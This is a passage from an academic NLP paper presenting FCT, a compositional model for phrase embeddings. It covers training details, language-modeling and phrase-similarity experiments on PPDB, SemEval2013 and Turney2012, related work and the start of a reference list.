a single thread’s data is sufficient for learning them. We take a similar approach for updating the task- specific (TASK-SPEC) part of the joint objective dur- ing FCT-Joint training. We choose a single thread to optimize the TASK-SPEC objective while all other threads optimize the LM objective. This means that αs are updated using the task-specific thread. Re- stricting updates for both sets of parameters to a sin- gle thread does not slow training since gradient com- putation is very fast for the embeddings and αs. For joint training, we can tradeoff between the two objectives (TASK-SPEC and LM) by setting a weight for each objective (e.g. c1 and c2.) How- ever, under the multi-threaded setting we cannot do this explicitly since the number of threads assigned to each part of the objective influences how the terms are weighted. Suppose that we assign n1 threads to TASK-SPEC and n2 to LM. Since each thread takes a similar amount of time, the actual weights will be roughly c1 = c1′ ∗n1 and c2 = c2′ ∗n2. Therefore, we first fix the numbers of threads and then tune c1′ and c2′. In all of our experiments that use distributed training, we use 12 threads. Training Details: Unless otherwise indicated we use 200-dimensional embeddings, which achieved a good balance between accuracy and efficiency. We use L2 regularization on the weights α in FCT as well as for the matrices W of RNN baselines in Sec- tion 6. In all experiments, the learning rates, num- bers of iterations and the weights of L2 regularizers are tuned on development data. We experiment with both negative sampling based NCE training (Mikolov et al., 2013b) for training 231 PPDB XXL Total Pairs Training Pairs Vocab Size NYT Phrases Words Vocab Size Train 120,552 24,300 5,954 Train 84,149,192 518,103,942 518,235 Dev 644 500 - Dev 30,000 - - Test 645 500 - Test 30,000 - - Table 2: Statistics of NYT and PPDB data. “Training pairs” are pairs of bigram phrase and word used in experiments. word2vec embeddings, the LM objective, and the TASK-SPEC objective; as well as use hierarchical softmax training (HS) for language modeling exper- iments. We use a window size c=5, the default of word2vec. We remove types that occur less than 5 times (default setting of word2vec). The vo- cabulary is the same for all evaluations. For NCE training we sample 15 words as negative samples for each training instance according to their frequencies in raw texts. Following Mikolov et al. (2013b) if w has frequency u(w) we set the sampling probability of w to p(w) ∝ u(w)3/4. For HS training we build a Hoffman tree based on word frequency. Pre-trained Word Embeddings For methods that require pre-trained lexical embeddings (FCT with pre-training, SUM (Section 5), and the FCT and RNN models in Section 6) we always use embeddings2 trained with the skip-gram model of word2vec. The embeddings are trained with NCE estimation using the same settings described above. 5 Experiments: Language Modeling We begin with experiments on FCT for language modeling tasks (Section 3.1). The resultant em- beddings can then be used for pre-training in task- specific settings (Section 6). Data We use the 1994-97 subset from the New York Times (NYT) portion of Gigaword v5.0 (Parker et al., 2011). Sentences are tokenized us- ing OpenNLP.3 We removed words with frequencies less than 5, yielding a vocabulary of 518,235 word forms and 515,301,382 tokens for training word em- beddings. This dataset is used for both training baseline word embeddings and evaluating our models trained with the LM objective. When evaluating the LM task we consider bigram NPs in isolation (see the 2We use “input embeddings” learned by word2vec. 3https://opennlp.apache.org/ “Phrases” column in Table 2). For FCT features that require syntactic information, we extract the NYT portion of Annotated Gigaword (Napoles et al., 2012), which uses the Stanford parser’s anno- tations. We use all bigram noun phrases (obtained from the annotated data) as the input phrases for Eq. (3). A subset from January 1998 of NYT data is withheld for evaluation. Baselines We include two baselines. The first is to use each component word to predict the context of the phrase with the skip gram model (Mikolov et al., 2013a) and then average the scores to get the probability (denoted as word2vec). The sec- ond is to use SUM of the skip-gram embeddings to predict the scores. Training the FCT models with pre-trained word embeddings requires running the skip-gram model on NYT data for 2 iterations: one for word2vec training and one for learning FCT. Therefore, we also run the word2vec model for two epochs to provide embeddings for the baselines. 5.1 Results We evaluate the perplexity of language models that include lexical embeddings and our composed phrase embeddings from FCT using the LM objec- tive. We use the perplexity computation method of Mikolov et al. (2013a) suitable for skip-gram mod- els. The FCT models are trained by the HS strategy, which can output the exact probability efficiently and was shown by Yu and Dredze (2014) to obtain better performance on language modeling. Since in Section 6.1 we use FCT models trained by NCE, we also include the results of models trained by NCE. Note that scores obtained from a model trained with HS or NCE are not comparable. While the model trained by HS is efficient to evaluate perplexities, NCE training requires summation over all words in the vocabulary in the denominator of the softmax to compute perplexity, an impracticality for large vo- cabulary. Therefore, we report NCE loss with a fixed set of samples for NCE trained models. 232 Perplexity (HS training) NCE loss (NCE training) Model Subset Train Dev Test Subset Train Dev Test SUM (2 epochs) 7.620 7.577 7.500 2.312 2.226 2.061 word2vec (2 epochs) 7.103 7.074 7.052 2.274 2.195 2.025 FCT (random init, 2 epochs) 6.753 6.628 6.713 1.879 1.722 1.659 FCT (with pre-training, 1 epochs) 6.641 6.540 6.552 1.816 1.691 1.620 Table 3: Language model perplexity and NCE loss on a subset of train, dev, and test NYT data. ‖λ1‖�‖λ2‖ ‖λ1‖≈‖λ2‖ ‖λ1‖�‖λ2‖ Model biological north-eastern dead medicinal new an diversity part body products trial extension FCT sensitivity northeastern remains drugs proceeding signed natural sprawling grave uses cross-examination terminated abilities preserve skeleton chemicals defendant temporary species area full SUM destruction portion unconscious marijuana new an racial result dying packaging judge renewal genetic integral flesh substances courtroom another cultural chunk signing Table 4: Differences in the nearest neighbors from the two phrase embedding models. Table 3 shows results for the NYT training data (subset of the full training data containing 30,000 phrases with their contexts from July 1994), de- velopment and test data. Language models with FCT performed much better than the SUM and word2vec baselines, under both NCE and HS training. Note that FCT with pre-training makes a single pass over the whole NYT corpus and then a pass over only the bigram NPs, and the random initialization model makes a pass over the bigrams twice. This is less data compared to two passes over the full data (baselines), which indicates that FCT better captures the context distributions of phrases. Qualitative Analysis Table 4 shows words and their most similar phrases (nearest neighbors) com- puted by FCT and SUM. We show three types of phrases: one where the two words in a phrase con- tribute equally to the phrase embedding, where the first word dominates the second in the phrase em- bedding, and vice versa. We measure the effect of each word by computing the total magnitude of the λ vector for each word in the phrase. For example, for the phrase “an extension”, the embedding for the second word dominates the resulting phrase embed- ding (‖λ1‖ � ‖λ2‖) as learned by FCT. The table highlights the differences between the methods by showing the most relevant phrases not selected as most relevant by the other method. It is clear that words selected using FCT are more semantically re- lated than those of the baseline. 6 Experiments: Task-specific Training: Phrase Similarity Data We consider several phrase similarity datasets for evaluating task-specific training. Table 5 summarizes these datasets and shows examples of inputs and outputs for each task. PPDB The Paraphrase Database (PPDB)4 (Gan- itkevitch et al., 2013) contains tens of millions of automatically extracted paraphrase pairs, including words and phrases. We extract all paraphrases con- taining a bigram noun phrase and a noun word from PPDB. Since articles usually have little contribu- tions to the phrase meaning, we removed the easy cases of all pairs in which the phrase is composed of an article and a noun.Next, we removed duplicate pairs: if <A,B> occurred in PPDB, we removed re- lations of <B,A>. PPDB is organized into 6 parts, ranging from S (small) to XXXL. Division into these sets is based on an automatically derived accuracy metric. We extracted paraphrases from the XXL set. The most accurate (i.e. first) 1,000 pairs are used for evaluation and divided into a dev set (500 pairs) and test set (500 pairs); the remaining pairs were used for training. Our PPDB task is an extension of mea- suring PPDB semantic similarity between words (Yu 4http://www.cis.upenn.edu/˜ccb/ppdb/ 233 Data Set Input Output (1) PPDB medicinal products drugs (2)SemEval2013 <small spot, flect> True <male kangaroo, point> False (3)Turney2012 monosyllabic word monosyllable, hyalinization, fund, gittern, killer (4) PPDB (ngram) contribution of the european union eu contribution Table 5: Examples of phrase similarity tasks. (1) PPDB is a ranking task, in which an input bigram and a output noun are given, and the goal is to rank the output word over other words in the vocabulary. (2) SemEval2013 is a binary classification task: determine whether an input pair of a bigram and a word form a paraphrase (True) or not (False). (3) Turney2012 is a multi-class classification task: determine the word most similar to the input phrase (in bold) from the five output candidates. For the 10-choice task, the goal is to select the most similar pair between the combination of one bigram phrase, i.e., the input phrase or the swapped input (“word monosyllabic” for this example), and the five output candidates. The correct answer in this case should still be the pair of original input phrase and the original correct output candidate (in bold). (4) PPDB (ngram) is similar to PPDB, but in which both inputs and outputs becomes noun phrases with arbitrary lengths. and Dredze, 2014) to that between phrases. Data de- tails appear in Table 2. Phrase Similarity Datasets We use a variety of human annotated datasets to evaluate phrase se- mantic similarity: the SemEval2013 shared task (Korkontzelos et al., 2013), and the noun-modifier problem (Turney2012) in Turney (2012). Both tasks provide evaluation data and training data. Se- mEval2013 Task 5(a) is a classification task to de- termine if a word phrase pair are semantically simi- lar. Turney2012 is a task to select the closest match- ing candidate word for a given phrase from candi- date words. The original task contained seven can- didates, two of which are component words of the input phrase (seven-choice task). Followup work has since removed the components words from the can- didates (five-choice task). Turney (2012) also pro- pose a 10-choice task based on this same dataset. In this task, the input bigram noun phrase will have its component words swapped. Then all the pairs of swapped phrase and a candidate word will be treated as a negative example. Therefore, each input phrase will correspond to 10 test examples where only one of them is the positive one. Longer Phrases: PPDB (ngram-to-ngram) To show the generality of our approach we evaluate our method on phrases longer than bigrams. We extract arbitrary length noun phrase pairs from PPDB. We only include phrase pairs that differ by more than one word; otherwise the task would reduce to eval- uating unigram similarity. Similar to the bigram-to- unigram task, we used the XXL set and removed du- plicate pairs. We used the most accurate pairs for development (2,821 pairs) and test (2,920 pairs); the remaining 148,838 pairs were used for training. As before, we rely on negative sampling to effi- ciently compute the objective during training. For each source/target n-gram pair, we sample negative noun phrases as outputs. Both the target phrase and the negative phrases are transformed to their phrase embeddings with the current parameters. We then compute inner products between embedding of the source phrase and these output embeddings, and up- date the parameters according to the NCE objective. We use the same feature templates as in Table 1. Notice that the XXL set contains several subsets (e.g., M, L ,XL) ranked by accuracy. In the experi- ments we also investigate their performance on dev data. Unless otherwise specified, the full set is se- lected (performs best on dev set) for training. Baselines We compare to the common and ef- fective point-wise addition (SUM) method (Mitchell and Lapata, 2010).5 We additionally include Weighted SUM, which learns overall dimension specific weights from task-specific training, the equivalent of FCT with αjk=0 and bij learned from data. Furthermore, we compare to dataset specific 5Mitchell and Lapata (2010) also show success with point- wise product (MULTI) for VSMs. However, MULTI is ill-suited to word embeddings and gave poor results in all our experi- ments. Mikolov et al. (2013b) show that sum of embeddings is related to product of context distributions because of the loga- rithmic computation in the output layer. 234 baselines: we re-implemented the recursive neural network model (RNN) (Socher et al., 2013a) and the Dual VSM algorithm in Turney (2012)6 so that they can be trained on our dataset. We also include results for fine-tuning word embeddings in SUM and Weighted SUM with TASK-SPEC objectives, which demonstrate improvements over the corre- sponding methods without fine-tuning. As before, word embeddings are pre-trained with word2vec. RNNs serve as another way to model the com- positionally of bigrams. We run an RNN on bi- grams and associated sub-trees, the same setting FCT uses, and are trained on our TASK-SPEC objectives with the technique described in Section 3.4. As in Socher et al. (2013a), we refine the matrix W in Eq. (5) according to the POS tags of the component words.7 For example, for a bigram NP like new/ADJ trial/NN, we use a matrix WADJ−NN to transform the two word embeddings to the phrase embedding. In the experiments we have 60 different matrices in total for bigram NPs. The number is larger than that in Socher et al. (2013a) due to incorrect tags in au- tomatic parses. Since the RNN model has time complexity O(n2), we compare RNNs with different sized embeddings. The first one uses embeddings with 50 dimensions, which has the same size as the embeddings used in Socher et al. (2013a), and has similar complexity to our model with 200 dimension embeddings. The second model uses the same 200 dimension embed- dings as our model but is significantly more compu- tationally expensive. For all models, we normalize the embeddings so that the L-2 norm equals 1, which is important in measuring semantic similarity via inner product. 6.1 Results: Bigram Phrases PPDB Our first task is to measure phrase simi- larity on PPDB. Training uses the TASK-SPEC ob- 6We did not include results for a holistic model as in Turney (2012), since most of the phrases (especially for those in PPDB) in our experiments are common phrases, making the vocabulary too large to train. One solution would be to only train holistic embeddings for phrases in the test data, but examination of a test set before training is not a realistic assumption. 7We do not compare the performance between using a single matrix and several matrices since, as discussed in Socher et al. (2013a), W s refined with POS tags work much better than using a single W . That also supports the argument in this paper, that it is important to determine the transformation with more features. 10^3 10^4 10^5 34 36 38 40 42 44 46 48 50 52 54 Vocabulary Sizes M R R o n T e s t S e t( % ) SUM RNN50 RNN200 FCT (a) MRR of models with fixed word embeddings 10^3 10^4 10^5 35 40 45 50 55 60 65 70 Vocabulary Sizes M R R o n T e s t S e t( % ) SUM RNN50 RNN200 FCT FCT−pipeline FCT−joint (b) MRR of models with fine-tuning Figure 1: Performance on PPDB task (test set). jective (Eq. (4) with NCE training) where data are phrase-word pairs < A,B >. The goal is to select B from a set of candidates given A, where pair sim- ilarity is measured using inner product. We use can- didate sets of size 1k/10k/100k from the most fre- quent N words in NYT and report mean reciprocal rank (MRR). We report results with the baseline methods (SUM, Weighted SUM, RNN). For FCT we report training with the TASK-SPEC objective, the joint-objective (FCT-J) and the pipeline approach (FCT-P). To en- sure that the TASK-SPEC objective has a stronger in- fluence in FCT-Joint, we weighted each training in- stance of LM by 0.01, which is equivalent to setting the learning rate of the LM objective equal to η/100 and that of the TASK-SPEC objective as η. Train- ing makes the same number of passes with the same learning rate as training with the TASK-SPEC objec- tive only. For each method we report results with and without fine-tuning the word embeddings on the labeled data. We run FCT on the PPDB training data for 5 epochs with learning rate η = 0.05, which are both selected from development set. Fig. 1 shows the overall MRR results on differ- 235 Fine-tuning MRR Model Objective Word Emb @ 10k SUM - - 41.19 SUM TASK-SPEC Y 45.01 WSum TASK-SPEC Y 45.43 RNN 50 TASK-SPEC N 37.81 RNN 50 TASK-SPEC Y 39.25 RNN 200 TASK-SPEC N 41.13 RNN 200 TASK-SPEC Y 40.50 FCT TASK-SPEC N 41.96 FCT TASK-SPEC Y 46.99 FCT LM Y 42.63 FCT-P TASK-SPEC+LM Y 49.44 FCT-J TASK-SPEC+LM joint 51.65 Table 6: Performance on the PPDB task (test data). ent candidate vocabulary sizes (1k, 10k and 100k), and Table 6 highlights the results on the vocabulary using the top 10k words. Overall, FCT with TASK- SPEC training improves over all the baseline meth- ods in each setting. Fine-tuning word embeddings improves all methods except RNN (d=200). We note that the RNN performs poorly, possibly because it uses a complex transformation from word em- bedding to phrase embeddings, making the learned transformation difficult to generalize well to new phrases and words when the task-specific labeled data is small. As a result, there is no guarantee of comparability between new pairs of phrases and word embeddings. The phrase embeddings may end up in a different part of the subspace from the word embeddings. Comparing to SUM and Weighted SUM, FCT is capable of using features providing critical con- textual information, which is the source of FCT’s improvement. Additionally, since the RNNs also used POS tags and parsing information yet achieved lower scores than FCT, our results show that FCT more effectively uses these features. To better show this advantage, we train FCT models with only POS tag features, which achieve 46.37/41.20 on MRR@10k with/without fine-tuning word embed- dings, still better than RNNs. See Section 6.3 for a full ablation study of features in Table 1. Semi-supervised Results: Table 6 also high- lighted the improvement from semi-supervised learning. First, the fully unsupervised method (LM) improves over SUM, showing that improvements in language modeling carry over to semantic similar- ity tasks. This correlation between the LM ob- jective and the target task ensures the success of semi-supervised training. As a result, both semi- supervised methods, FCT-J and FCT-P improves over the supervised methods; and FCT-J achieves the best results of all methods, including FCT-P. This demonstrates the effectiveness of including large amounts of unlabeled data while learning with a TASK-SPEC objective. We believe that by adding the LM objective, we can propagate the semantic in- formation of embeddings to the words that do not appear in the labeled data (see the differences be- tween vocabulary sizes in Table 2). The improvement of FCT-J over FCT-P also in- dicates that the joint training strategy can be more effective than the traditional pipeline-based pre- training. As discussed in Section 3.3, the pipeline method, although commonly used in deep learning literatures, does not suit NLP applications well be- cause of the sparsity in word embeddings. There- fore, our results suggest an alternative solution to a wide range of NLP problems where labeled data has low coverage of the vocabulary. For future work, we will further investigate the idea of joint training on more tasks and compare with the pipeline method. Results on SemEval2013 and Turney2012 We evaluate the same methods on SemEval2013 and the Turney2012 5- and 10-choice tasks, which both provide training and test splits. The same base- lines in the PPDB experiments, as well as the Dual Space method of Turney (2012) and the recursive auto-encoder (RAE) from Socher et al. (2011) are used for comparison. Since the tasks did not provide any development data, we used cross-validation (5 folds) for tuning the parameters, and finally set the training epochs to be 20 and η = 0.01. For joint training, the weight of the LM objective is weighted by 0.005 (i.e. with a learning rate equal to 0.005η) since the training sets for these two tasks are much smaller. For convenience, we also include results for Dual Space as reported in Turney (2012), though they are not comparable here since Turney (2012) used a much larger training set. Table 7 shows similar trends as PPDB. One dif- ference here is that RNNs do better with 200 dimen- 236 Fine-tuning SemEval2013 Turney2012 Model Objective Word Emb Test Acc (5) Acc (10) MRR @ 10k SUM - - 65.46 39.58 19.79 12.00 SUM TASK-SPEC Y 67.93 48.15 24.07 14.32 Weighted Sum TASK-SPEC Y 69.51 52.55 26.16 14.74 RNN (d=50) TASK-SPEC N 67.20 39.64 25.35 1.39 RNN (d=50) TASK-SPEC Y 70.36 41.96 27.20 1.46 RNN (d=200) TASK-SPEC N 71.50 40.95 27.20 3.89 RNN (d=200) TASK-SPEC Y 72.22 42.84 29.98 4.03 Dual Space1 - - 52.47 27.55 16.36 2.22 Dual Space2 - - - 58.3 41.5 - RAE auto-encoder - 51.75 22.99 14.81 0.16 FCT TASK-SPEC N 68.84 41.90 33.80 8.50 FCT TASK-SPEC Y 70.36 52.31 38.66 13.19 FCT LM - 67.22 42.59 27.55 14.07 FCT-P TASK-SPEC+LM Y 70.64 53.09 39.12 14.17 FCT-J TASK-SPEC+LM joint 70.65 53.31 39.12 14.25 Table 7: Performance on SemEval2013 and Turney2012 semantic similarity tasks. Dual Space1: Our reimple- mentation of the method in (Turney, 2012). Dual Space2: The result reported in Turney (2012). RAE is the recursive auto-encoder in (Socher et al., 2011), which is trained with the reconstruction-based objective of auto-encoder. sional embeddings on SemEval2013, though at a dimensionality with similar computational complex- ity to FCT (d = 50), FCT improves. Additionally, on the 10-choice task of Turney2012, both the FCT and the RNN models, either with or without fine- tuning word embeddings, significantly outperform SUM, showing that both models capture the word or- der information. Fine tuning gives smaller gains on RNNs likely because the limited number of training examples is insufficient for the complex RNN model. The LM objective leads to improvements on all three tasks, while RAE does not perform significantly bet- ter than random guessing. These results are perhaps attributable to the lack of assumptions in the objec- tive about the relations between word embeddings and phrase embeddings, making the learned phrase embeddings not comparable to word embeddings. 6.2 Dimensionality and Complexity A benefit of FCT is that it is computationally effi- cient, allowing it to easily scale to embeddings of 200 dimensions. By contrast, RNN models typi- cally use smaller sized embeddings (d = 25 proved best in Socher et al., 2013a) and cannot scale up to large datasets when larger dimensionality embed- dings are used. For example, when training on the PPDB data, the FCT with d = 200 processes 2.33 instances per ms, while the RNN with the same di- mensionality processes 0.31 instance/ms. Training an RNN with d = 50 is of comparable speed to FCT with d = 200. Figure 2 (a-b) shows the MRR on PPDB for 1k and 10k candidate sets for both the SUM baseline and FCT with a TASK-SPEC objective and full features, as compared to RNNs with differ- ent sized embeddings. Both FCT and RNN use fine- tuned embeddings. With a small number of embed- ding dimensions, RNNs achieve better results. How- ever, FCT can scale to much higher dimensionality embeddings, which easily surpasses the results of RNNs. This is especially important when learning a large number of embeddings: the 25-dimensional space may not be sufficient to capture the semantic diversity, as evidenced by the poor performance of RNNs with lower dimensionality. Similar trends observed on the PPDB data also appear on the tasks of Turney2012 and SemEval2013. Figure 2 (c-f) shows the perfor- mances on these two tasks. On the Turney2012 task, the FCT even outperforms the RNN model us- ing embeddings with the same dimensionality. One possible reason is due to overfitting of the more com- plex RNN models on these small training sets. Fig- ure 2(d) shows that the performances of FCT on the 10-choice task are less affected by the dimensions of embeddings. That is because the composition models can well handle the word order information, 237 0 50 100 150 200 250 300 350 400 450 500 34 36 38 40 42 44 46 48 50 52 rnn25 rnn50 rnn200 dimension of embeddings M R R (% ) SUM FCT (a) MRR@1k on PPDB dev set 0 50 100 150 200 250 300 350 400 450 500 22 24 26 28 30 32 34 36 38 dimension of embeddings M R R (% ) rnn25 rnn50 rnn200 SUM FCT (b) MRR@10k on PPDB dev set 0 50 100 150 200 250 300 350 400 450 500 30 35 40 45 50 55 rnn25 rnn50 rnn200 dimension of embeddings A C C (% ) SUM FCT (c) accuracy on the 5-choice task in Turney2012 0 50 100 150 200 250 300 350 400 450 500 15 20 25 30 35 40 45 rnn25 rnn50 rnn200 dimension of embeddings A C C (% ) SUM FCT (d) accuracy on the 10-choice task in Turney2012 0 50 100 150 200 250 300 350 400 450 500 0 2 4 6 8 10 12 14 16 18 dimension of embeddings M R R (% ) rnn50 rnn200 SUM FCT (e) MRR@10k on Turney2012 0 50 100 150 200 250 300 350 400 450 500 62 63 64 65 66 67 68 69 70 71 72 rnn25 rnn50 rnn200 dimension of embeddings A C C (% ) SUM FCT (f) accuracy on the SemEval2013 Figure 2: Effects of embedding dimension on the semantic similarity tasks. The notations “RNN< d >” in the figures stand for the RNN models trained with d-dimensional embeddings. which is critical to solving the 10-choice task, with- out relying on too much semantic information from word embeddings themselves. Figure 2(e) shows that when the dimensionality of embeddings is lower than 100, both FCT and RNN do worse than the base- line. This is likely because in the case of low dimen- sionality, updating embeddings is likely to change the whole structure of embeddings of training words, making both the fine-tuned word embeddings and the learned phrase embeddings incomparable to the other words. The performance of RNN with 25- dimension embeddings is too low so it is omitted. 6.3 Experiments on Longer Phrases So far our experiments have focused on bigram phrases. We now show that FCT improves for longer n-gram phrases (Table 8). Without fine-tuning, FCT performs significantly better than the other models, showing that the model can better capture the con- text and annotation information related to phrase se- mantics with the help of rich features. With different amounts of training data, we found that WSum and FCT both perform better when trained on the PPDB- Train Fine-tuning MRR Model Set Word Emb @10k @ 100k SUM - N 46.53 16.62 WSum L N 51.10 18.92 FCT L N 68.91 29.04 SUM XXL Y 74.30 29.14 WSum XXL Y 75.37 31.13 FCT XXL Y 79.68 36.00 Table 8: Results on PPDB ngram-to-ngram task. L set, a more accurate subset of XXL with 24,279 phrase pairs. This can be viewed as a low resource setting, where there is limited data for fine-tuning word embeddings. With fine-tuning of word embeddings, FCT still significantly beats the other models. All three methods get their best results on the full XXL set, likely because it contains more phrase pairs to al- leviate over fitting caused by fine-tuning word em- beddings. Notice that fine-tuning greatly helps all the methods, including SUM, indicating that this ngram-to-ngram task is still largely dominated 238 Feature Set MRR @ 10k FCT 79.68 -clus 76.82 -POS 77.67 -Compound 79.40 -Head 77.50 -Distance 78.86 WSum 75.37 SUM 74.30 Table 9: Ablation study on dev set of the PPDB ngram-to-ngram task (MRR @ 10k). by the quality of single word semantics. Therefore, we expect larger gains from FCT on tasks where sin- gle word embeddings are less important, such as re- lation extraction (long distance dependencies) and question understanding (intentions are largely de- pendent on interrogatives). Finally, we demonstrate the efficacy of different features in FCT (Table 1) with an ablation study (Ta- ble 9). Word cluster features contribute most, be- cause the point-wise product between word embed- ding and its context word cluster representation is actually an approximation of the word-word inter- action, which is believed important for phrase com- positions. Head features, though few, also make a big difference, reflecting the importance of syntactic information. Compound features do not have much of an impact, possibly because the simpler features capture enough information. 7 Related Work Compositional semantic models aim to build distri- butional representations of a phrase from its compo- nent word representations. A traditional approach for composition is to form a point-wise combina- tion of single word representations with composi- tional operators either pre-defined (e.g. element- wise sum/multiplication) or learned from data (Le and Mikolov, 2014). However, these approaches ignore the inner structure of phrases, e.g. the or- der of words in a phrase and its syntactic tree, and the point-wise operations are usually less expressive. One solution is to apply a matrix transformation (possibly followed by a non-linear transformation) to the concatenation of component word represen- tations (Zanzotto et al., 2010). For longer phrases, matrix multiplication can be applied recursively ac- cording to the associated syntactic trees (Socher et al., 2010). However, because the input of the model is the concatenation of word representations, ma- trix transformations cannot capture interactions be- tween a word and its contexts, or between compo- nent words. There are three ways to restore these interac- tions: The first is to use word-specific/tensor trans- formations to force the interactions between com- ponent words in a phrase. In these methods, word- specific transformations, which are usually matri- ces, are learned for a subset of words according to their syntactic properties (e.g. POS tags) (Baroni and Zamparelli, 2010; Socher et al., 2012; Grefen- stette et al., 2013; Erk, 2013). Composition between a word in this subset and another word becomes the multiplication between the matrix associated with one word and the embedding of the other, produc- ing a new embedding for the phrase. Using one tensor (not word-specific) to compose two embed- ding vectors (has not been tested on phrase similar- ity tasks) (Bordes et al., 2014; Socher et al., 2013b) is a special case of this approach, where a “word- specific transformation matrix” is derived by multi- plying the tensor and the word embedding. Addi- tionally, word-specific matrices can only capture the interaction between a word and one of its context words; others have considered extensions to multi- ple words (Grefenstette et al., 2013; Dinu and Ba- roni, 2014). The primary drawback of these ap- proaches is the high computational complexity, lim- iting their usefulness for semantics (Section 6.2.) A second approach draws on the concept of con- textualization (Erk and Padó, 2008; Dinu and Lap- ata, 2010; Thater et al., 2011), which sums embed- dings of multiple words in a linear combination. For example, Cheung and Penn (2013) apply contextu- alization to word compositions in a generative event extraction model. However, this is an indirect way to capture interactions (the transformations are still unaware of interactions between components), and thus has not been a popular choice for composition. The third approach is to refine word-independent compositional transformations with annotation fea- tures. FCT falls under this approach. The primary advantage is that composition can rely on richer lin- guistic features from the context. While the em- 239 beddings of component words still cannot interact, they can interact with other information (i.e. fea- tures) of their context words, and even the global features. Recent research has created novel features based on combining word embeddings and contex- tual information (Nguyen and Grishman, 2014; Roth and Woodsend, 2014; Kiros et al., 2014; Yu et al., 2014; Yu et al., 2015). Yu et al. (2015) further pro- posed converting the contextual features into a hid- den layer called feature embeddings, which is sim- ilar to the α matrix in this paper. Examples of ap- plications to phrase semantics include Socher et al. (2013a) and Hermann and Blunsom (2013), who en- hanced RNNs by refining the transformation matri- ces with phrase types and CCG super tags. How- ever, these models are only able to use limited infor- mation (usually one property for each compositional transformation), whereas FCT exploits multiple fea- tures. Finally, our work is related to recent work on low-rank tensor approximations. When we use the phrase embedding ep in Eq. (1) to predict a label y, the score of y given phrase p will be s(y,p) = UTy ep = ∑N i U T y (λi � ewi) in log-linear models, where Uy is the parameter vector for y. This is equivalent to using a parameter tensor T to evaluate the score with s′(y,p) = ∑N i T ×1 y×2 f(wi,p)× ewi , while forcing the tensor to have a low-rank form as T ≈ U⊗α⊗ew. Here ×k indicates tensor mul- tiplication of the kth view, and ⊗ indicates matrix outer product (Kolda and Bader, 2009). From this point of view, our work is closely related to the dis- criminative training methods for low-rank tensors in NLP (Cao and Khudanpur, 2014; Lei et al., 2014), while it can handle more complex ngram-to-ngram tasks, where the label y also has its embedding com- posed from basic word embeddings. Therefore our model can capture the above work as special cases. Moreover, we have a different method of decompos- ing the inputs, which results in views of lexical parts and non-lexical features. As we show in this paper, this input decomposition allows us to benefit from pre-trained word embeddings and feature weights. 8 Conclusion We have presented FCT, a new composition model for deriving phrase embeddings from word embed- dings. Compared to existing phrase composition models, FCT is very efficient and can utilize high di- mensional word embeddings, which are crucial for semantic similarity tasks. We have demonstrated how FCT can be utilized in a language modeling set- ting, as well as tuned with task-specific data. Fine- tuning embeddings on task-specific data can further improve FCT, but combining both LM and TASK- SPEC objectives yields the best results. We have demonstrated improvements on both language mod- eling and several semantic similarity tasks. Our im- plementation and datasets are publicly available.8 While our results demonstrate improvements for longer phrases, we still only focus on flat phrase structures. In future work we plan to FCT with the idea of recursively building representations. This would allow the utilization of hierarchical structure while restricting compositions to a small number of components. Acknowledgments We thank Matthew R. Gormley for his input and anonymous reviewers for their comments. Mo Yu is supported by the China Scholarship Council and by NSFC 61173073. References Marco Baroni and Roberto Zamparelli. 2010. Nouns are vectors, adjectives are matrices: Representing adjective-noun constructions in semantic space. In Empirical Methods in Natural Language Processing (EMNLP), pages 1183–1193. Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Janvin. 2003. A neural probabilistic lan- guage model. The Journal of Machine Learning Re- search (JMLR), 3:1137–1155. Antoine Bordes, Xavier Glorot, Jason Weston, and Yoshua Bengio. 2014. A semantic matching energy function for learning with multi-relational data. Ma- chine Learning, 94(2):233–259. Yuan Cao and Sanjeev Khudanpur. 2014. Online learn- ing in tensor space. In Association for Computational Linguistics (ACL), pages 666–675. Jackie Chi Kit Cheung and Gerald Penn. 2013. Prob- abilistic domain modelling with contextualized distri- butional semantic vectors. In Association for Compu- tational Linguistics (ACL), pages 392–401. 8 https://github.com/Gorov/FCT_PhraseSim_TACL 240 Ronan Collobert and Jason Weston. 2008. A unified ar- chitecture for natural language processing: Deep neu- ral networks with multitask learning. In International Conference on Machine Learning (ICML), pages 160– 167. Ronan Collobert. 2011. Deep learning for efficient dis- criminative parsing. In International Conference on Artificial Intelligence and Statistics (AISTATS), pages 224–232. Georgiana Dinu and Marco Baroni. 2014. How to make words with vectors: Phrase generation in distributional semantics. In Association for Computational Linguis- tics (ACL), pages 624–633. Georgiana Dinu and Mirella Lapata. 2010. Measuring distributional similarity in context. In Empirical Meth- ods in Natural Language Processing (EMNLP), pages 1162–1172. Katrin Erk and Sebastian Padó. 2008. A structured vector space model for word meaning in context. In Empirical Methods in Natural Language Processing (EMNLP), pages 897–906. Katrin Erk. 2013. Towards a semantics for distributional representations. In International Conference on Com- putational Semantics (IWCS 2013), pages 95–106. Juri Ganitkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2013. Ppdb: The paraphrase database. In North American Chapter of the Associ- ation for Computational Linguistics (NAACL), pages 758–764. Edward Grefenstette, Georgiana Dinu, Yao-Zhong Zhang, Mehrnoosh Sadrzadeh, and Marco Baroni. 2013. Multi-step regression learning for composi- tional distributional semantics. arXiv:1301.6939. Karl Moritz Hermann and Phil Blunsom. 2013. The role of syntax in vector space models of compositional se- mantics. In Association for Computational Linguistics (ACL), pages 894–904. Karl Moritz Hermann, Dipanjan Das, Jason Weston, and Kuzman Ganchev. 2014. Semantic frame identifi- cation with distributed word representations. In As- sociation for Computational Linguistics (ACL), pages 1448–1458. Eric H Huang, Richard Socher, Christopher D Manning, and Andrew Y Ng. 2012. Improving word representa- tions via global context and multiple word prototypes. In Association for Computational Linguistics (ACL), pages 873–882. Ryan Kiros, Richard Zemel, and Ruslan R Salakhutdinov. 2014. A multiplicative model for learning distributed text-based attribute representations. In Advances in Neural Information Processing Systems (NIPS), pages 2348–2356. Tamara G Kolda and Brett W Bader. 2009. Ten- sor decompositions and applications. SIAM review, 51(3):455–500. Ioannis Korkontzelos, Torsten Zesch, Fabio Massimo Zanzotto, and Chris Biemann. 2013. Semeval-2013 task 5: Evaluating phrasal semantics. In Joint Con- ference on Lexical and Computational Semantics (* SEM), pages 39–47. Quoc V Le and Tomas Mikolov. 2014. Distributed repre- sentations of sentences and documents. arXiv preprint arXiv:1405.4053. Tao Lei, Yu Xin, Yuan Zhang, Regina Barzilay, and Tommi Jaakkola. 2014. Low-rank tensors for scoring dependency structures. In Association for Computa- tional Linguistics (ACL), pages 1381–1391. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013a. Efficient 